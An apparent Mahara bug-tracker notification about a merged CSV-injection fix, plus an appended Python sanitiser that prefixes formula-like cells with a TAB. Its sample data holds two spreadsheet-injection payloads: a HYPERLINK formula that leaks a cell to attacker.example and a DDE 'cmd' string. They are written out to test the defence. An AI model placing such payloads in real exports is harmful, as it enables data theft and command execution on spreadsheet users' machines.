
mahara-contributors team mailing list archive

[Bug 1930471] A change has been merged


Reviewed:  https://reviews.mahara.org/12197
Committed: https://git.mahara.org/mahara/mahara/commit/da329097ae4c5ec77703643e0f3b79db4fb9e596
Submitter: Robert Lyon (robertl@xxxxxxxxxxxxxxx)
Branch:    20.04_STABLE

commit da329097ae4c5ec77703643e0f3b79db4fb9e596
Author: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
Date:   Thu Jun 3 12:20:23 2021 +1200

Security bug 1930471: Make exported CSV data safer

To avoid data exported from Mahara causing a CSV injection security
issue when imported in a spreadsheet program

Change-Id: Iedc258f33f1ca4e24fcb15f565da28828ef361ee
Signed-off-by: Robert Lyon <robertl@xxxxxxxxxxxxxxx>
(cherry picked from commit 941740b3f796316659d379819ffe7db93651df2e)
(cherry picked from commit 697a0c08dc3f0d433ec3941c84cc527e10962c0c)

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
Matching subscriptions: mahara-contributors
https://bugs.launchpad.net/bugs/1930471

Title:
  Exporting of CSV files needs to sanitize data

Status in Mahara:
  Fix Released
Status in Mahara 20.04 series:
  Fix Released
Status in Mahara 20.10 series:
  Fix Released
Status in Mahara 21.04 series:
  Fix Released

Bug description:
  When we export CSV files, like we do in the reports pages, we don't
  sanitize the output.

  This means if a person saves data (like their username) beginning with
  certain characters, e.g. = or + etc., then when the data is added into a
  spreadsheet program it will interpret the value as a command.

  This allows one to create a malicious string so that they can exploit
  spreadsheet vulnerabilities.

  Though this exploit isn't affecting Mahara itself - it can be the
  vector of transmission.

  It will be best if we sanitize the CSV exports to avoid this.
  A suggestion is to add a TAB character before any string that begins
  with a susceptible character.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1930471/+subscriptions
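
The mitigation the bug report suggests (a TAB in front of any cell whose first
character a spreadsheet would read as a formula operator), shown as a
self-contained example. This is added illustration, not Mahara's own code and
not the committed change; it is written in Python rather than Mahara's PHP so
the sanitiser, the round-trip reader and the output check can be run as they
stand. The report names "=" and "+"; the trigger set here also includes "-" and
"@" as a generalisation of the same problem, and the sample rows, payload
strings and function names are all constructed for this example.

```python
import csv
import io

# Leading characters that make a spreadsheet program evaluate the cell as a
# formula instead of displaying it as text. The bug report names "=" and "+";
# "-" and "@" are added here as a generalisation (assumption: this set is not
# taken from the Mahara change itself).
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# The neutralising prefix the bug report suggests: a TAB in front of the
# value stops the first visible character from being read as an operator.
SAFE_PREFIX = "\t"


def is_formula_like(value: str) -> bool:
    """Return True if a spreadsheet would treat this raw cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def sanitize_cell(value) -> str:
    """Neutralise one cell before it is written to the CSV export."""
    text = "" if value is None else str(value)
    if is_formula_like(text):
        return SAFE_PREFIX + text
    return text


def export_csv(header, rows) -> str:
    """Render rows as CSV text; every data cell is sanitised and quoted.

    QUOTE_ALL wraps each cell in double quotes and doubles any embedded
    quote, so a payload cannot break out of its cell either.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


def unsanitize_cell(value: str) -> str:
    """Inverse of sanitize_cell, for code that reads the export back."""
    if value.startswith(SAFE_PREFIX) and is_formula_like(value[1:]):
        return value[1:]
    return value


def import_csv(text: str):
    """Parse an export produced by export_csv back into (header, rows)."""
    reader = csv.reader(io.StringIO(text))
    header = next(reader)
    rows = [[unsanitize_cell(cell) for cell in row] for row in reader]
    return header, rows


def export_is_safe(text: str) -> bool:
    """Check an export the way a spreadsheet sees it: no raw cell may
    start with a formula trigger. Use this as the regression check."""
    return not any(
        is_formula_like(cell)
        for row in csv.reader(io.StringIO(text))
        for cell in row
    )


# Constructed sample rows standing in for a report export. The second and
# third usernames are attacker-chosen values of the kind the bug describes:
# a HYPERLINK() that leaks the neighbouring cell, and a "+"-prefixed command
# string. Both are illustrative, not observed data.
SAMPLE_HEADER = ["username", "displayname", "email"]
SAMPLE_ROWS = [
    ["alice", "Alice Example", "alice@example.org"],
    ['=HYPERLINK("https://attacker.example/"&B2,"open")', "Mallory", "m@example.org"],
    ["+cmd|' /C calc'!A0", "Trudy", "t@example.org"],
    ["-5 apples", "Dash User", "d@example.org"],
]


def sample_export() -> str:
    """Export the constructed sample rows with sanitisation applied."""
    return export_csv(SAMPLE_HEADER, SAMPLE_ROWS)


if __name__ == "__main__":
    out = sample_export()
    print(out)
    print("safe:", export_is_safe(out))
```

The TAB prefix is reversible, which is why import_csv can hand back the exact
original values, but any consumer that does not strip it will see a leading tab
on legitimate values such as "-5 apples"; that false-positive cost is inherent
to the approach. The widely used alternative of prefixing a single quote (')
neutralises the same characters but leaves a visible apostrophe in the cell.
Whichever prefix is chosen, the export_is_safe check is the one worth keeping:
it reads the file back exactly as a spreadsheet would and fails if any raw cell
still begins with a trigger character.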